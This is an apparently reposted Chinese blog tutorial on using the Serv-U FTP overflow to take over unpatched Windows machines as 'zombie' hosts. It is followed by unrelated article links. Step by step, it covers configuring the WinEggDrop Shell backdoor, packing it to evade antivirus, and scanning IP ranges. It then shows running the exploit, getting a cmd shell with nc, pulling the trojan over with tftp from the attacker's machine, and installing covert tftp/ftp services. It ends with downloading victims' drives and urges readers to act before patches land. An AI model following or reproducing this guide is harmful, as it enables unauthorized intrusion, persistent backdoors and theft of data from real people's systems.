serv-u溢出简单教程

简介:
之前的serv-u溢出真的是成功率100%。而且不知道有多少的机子被当成了肉机。 
估计现在还有这类肉机。心情比较好。所以写了这篇文件。让大家学会如何去找一 
台肉机练手。文章有破坏性。请不要破坏肉机上的东西。只做教学用。本教程只适合初级练手用。。高一级别的就不用看了。免得让人笑话。。
1,大家都知道WinEggDrop Shell后门是很强大的后门。有一点懂的人都知道它。 
下面我将演示如何配置它。适合初学者。 
查看wineggdrop shell后门所包含的工具。。有injectt.exe editserver.exe tback.dll 
等三个文件。
配置wineggdrop shell后门服务。要同时打开injectt.exe editserver.exe 服务..出现press any key to start 然回车。
然后进入中文与英文配置选择。我们选择中文。。所以按1键。
然后进入配置菜单。我只演示端口设置和注入dll名字的设置。密码和其他的设置自已可以慢慢设。。别忘了把密码记住。
设置服务程序的端口。。最好是哪些让人糊里糊涂的端口。比如75等。。设置好后按回车
设置注入dll文件名。这一点很关键。。一定要用svchost.exe这个关键进程。设置好后按回车
回到主菜单。。把他全设置好后。按a保存。然后按q离开。如果要看设置好的项目按b.要修改。直接让要修改的项。然后按a保存。
接下来。我们要压缩wineggdrop shell。。用aspack压缩injectt.exe 和 tback.dll两个文件。压缩只是为了跳避防火和查毒。。现在压缩的工具很多。用upx也行。如果要找这些工具。记得去看雪学院。。别告诉我。你不知道看雪。。。)::
接下来我们要找肉机了。别急。我们先打开ftpscan工具。然后查看他的使用方法。
ftpscan startip endip port thredas file 别告诉我这些不明白。哪我告诉你吧。startip。开始ip endip。结束ip...port 就是21端口了,因为我们要用serv-u溢出找肉机。 thredas 就是线程。工具有详细说明最好用1024线程。file 就是你要保存文件名。如下图就明白了。
记住要同段网络。不要用不同段网络扫。哪样是不行的。如下图。。溢出的ip终于出现了。。哈哈。。
我们试试serv-u溢出工具的用法。。su ip port user pass 
ip就是刚才用ftpscan扫出来溢出的i。port就是21端口了。。user pass就是刚才扫出来的用户和密码。
成功的标志如下图。就是成功了。哈哈。成功后要你用nc和telnet连接上8111端口。。最好用nc。如果没有。就用 win自带的telnet了。
已成功进入。得到了肉机的cmd shell了。。如下图演示。。 
并进入了肉机的c盘了。。。哈哈。。。高兴不。。
接下来我们要传文件到肉机上..先在自已的机子里开启tftpd32.exe工具。。如下图所示。。最好把tftpd32.exe启动在你有工具的哪个目录。哪样就很方便地传文件到肉机上了。。
 
我们得到肉机的cmd shell了。现在我们传文件上去。。我们传刚才的木马。。要在winnt/system32这个目录下。如下图。(下图是在c盘)。你可以进入winnt/system32目录下再传文件。。命令如下tftp -i ip get(上传) 文件名。 例如肉机自已的电脑ip是218.0.0.1 传的文件是injectt.exe 就tftp -i 218.0.0.1 get injectt.exe 就ok了。。如果出现timeout等信息。证明有防火。用net start查看一下。当然。我有私人工具。根本不用怕防火。这工具。我就不能告诉你们了。。
传完后。直接运行。injectt.exe远行。。。要把injectt.exe和tback.dll这两个文件传上去。。injectt.exe运行成功。
运行成功后。在本机打开dos窗口。。有nc的话就用nc ip port连上去。。例如肉机ip是127.0.0.1 然后就nc 127.0.0.1 port 。这个port就是你设置木马时所设置的端口。。也可以用telnet ip port连接。。连接成功后。要输入验证密码。。就是你设置木马时设的密码。我要你记住的。你记住了没有。
连接上肉机后。就会出现如下图所示。。然后输入help。就可以看到木马所有的命令。。及命令的功能。。像克隆帐号啊。开启终端啊。及清除日志啊。。很多很多。。自已对着工具帮助慢慢看。。
输入cmd的就进入肉机的cmdshell。。我们就进入了肉机的c:\winnt\system32目录下了。我们要传文件到这个目录。。
接下来我们要做tftpd服务。在肉机上做。一直就有些人搞上肉机后就开3389端口。。我认为是很不好的。。毕竟3389被人开启了。是管理员的话。一看就会知道了。所以我还是喜欢开tftp和ftp服务。。首先我们进入system32目录下的dllcache目录。。(这里指的win2k)然后用dir tftpd.exe /s查看有没有tftpd.exe这个文件。如果是c:\winnt\%systemroot%这个目录了。如果还没有。哪自已传一下上去吧。。然后把他copy到system32目录下。也可以copy到你想做ftp的一个目录下。。可以是任何盘。这里我们是copy到system32目录下。。
接下来。我们要传给肉机一个创建服务的工具。就是常用的instrv.exe工具。用来创建tftpd.exe服务。
传成功后。我们用instsrv.exe 创建tftp服务。。你可以先查看一下instsrv.exe的命令。。下图就是演示如何创建tftp服务的命令。
创建成功后。我们就要用net start tftp 启动服务了。。
启动成功后。我们在本机上试试是不是成功了。。打开dos窗口..然后tftp -i 肉机ip get 文件名。。 从肉机上拿文件到本机上。。显示成功。。就代表肉机已经是tftp服务器了。。。

接下来我们用另外一种方法做ftp服务器。就是用20cn哪里写的一个工具。。ftpserver.exe。。这个工具就是用来在肉机上创建ftp服务的。。我们选用tftp把ftpserver.exe传到肉机上。。并直接运行。。 
运行成功后。就可以用netstat -an是不是开启了服务的端口。。20cn的哪个ftpserver.exe采用的是521端口。自已在20cn哪里下过来自已配 
置。。
接下来我们就要用leapftp连接上肉机了。。真高兴。。leapftp我想大家都用过。哈哈。在ftp服务器里输入肉机的ip。。用户名就是你想要的盘符。如果想看c盘就输入c。如果想看d盘就输入d.以此类推。。端口是521端口。。连接成功后。刷新就可以看到整个c盘了。高兴吧。哈哈。。哈哈。。不用上3389一样可以看肉机的所有东西。哈哈。下载更方便。。你看了肉机的哪个文件。把他全给拉下来。哈哈。真好。。。
 
我的简单教程终于写完了。我想大家从我的这个教程里一定能找到几个肉机练手的。因为现在还存在着一部的管理员没有把serv-u这个溢出漏洞给打上补丁。所以要肉机练手。请尽快抓紧时间吧。一直没有时间写。。今天终于空闲了。所以把这篇文章送给小榕这里的朋友。不知道还有没有人记得我无产阶级。。曾经最爱注水的。此文章只适合初级练手用的。。。 













本文转自loveme2351CTO博客,原文链接:http://blog.51cto.com/loveme23/8620  ,如需转载请自行联系原作者

相关文章
|
7月前
|
C语言 C++
C语言进阶⑭(内存函数_以字节操作)momcpy+mommove+memcmp+memset
C语言进阶⑭(内存函数_以字节操作)momcpy+mommove+memcmp+memset
68 0
|
7月前
|
网络协议 Linux C++
Linux C/C++ 网络编程中地址格式转换(inet_pton和inet_ntop函数)
Linux C/C++ 网络编程中地址格式转换(inet_pton和inet_ntop函数)
353 0
|
7月前
|
存储 Java C语言
C 语言用户输入详解:scanf、fgets、内存地址解析及实用指南
您已经学习了 printf() 函数用于在 C 语言中输出值。 要获取用户输入,可以使用 scanf() 函数:
99 0
|
存储 Linux C语言
深入解析Linux环境下的sprintf()和printf()函数
在C语言中,`sprintf()`和`printf()`函数是用于格式化输出的两个重要函数。`sprintf()`函数将格式化的数据写入一个字符串,而`printf()`函数则将格式化的数据输出到标准输出。在Linux环境中,这两个函数被广泛应用于各种编程任务。本文将详细介绍这两个函数的用法,包括格式化字符串的语法和一些常见的使用场景。
555 1
|
存储 Serverless 数据安全/隐私保护
1.9 动态解密ShellCode反弹
动态解密执行技术可以对抗杀软的磁盘特征查杀。其原理是将程序代码段中的代码进行加密,然后将加密后的代码回写到原始位置。当程序运行时,将动态解密加密代码,并将解密后的代码回写到原始位置,从而实现内存加载。这种技术可以有效地规避杀软的特征码查杀,因为加密后的代码通常不会被标记为恶意代码。
145 0
|
C语言
由浅入深C系列四:memset/memcpy源码分析,为什么这二个函数的目的字符串在前面,源字符串在后面?
memset/memcpy源码分析,为什么这二个函数的目的字符串在前面,源字符串在后面?
|
中间件 Unix 业务中间件
刷新三观的HP-UX系统中的强指针赋值出core问题
刷新三观的HP-UX系统中的强指针赋值出core问题
刷新三观的HP-UX系统中的强指针赋值出core问题
|
安全 Linux C语言
[PWN][基础篇]保护函数和溢出实例
[PWN][基础篇]保护函数和溢出实例
177 0
[PWN][基础篇]保护函数和溢出实例
|
Shell Linux
[PWN][进阶篇]ROP_Ret2Shellcode-32实例(下)
[PWN][进阶篇]ROP_Ret2Shellcode-32实例
178 0
[PWN][进阶篇]ROP_Ret2Shellcode-32实例(下)
|
安全 Shell Linux
[PWN][进阶篇]ROP_Ret2Shellcode-32实例(上)
[PWN][进阶篇]ROP_Ret2Shellcode-32实例
206 0
[PWN][进阶篇]ROP_Ret2Shellcode-32实例(上)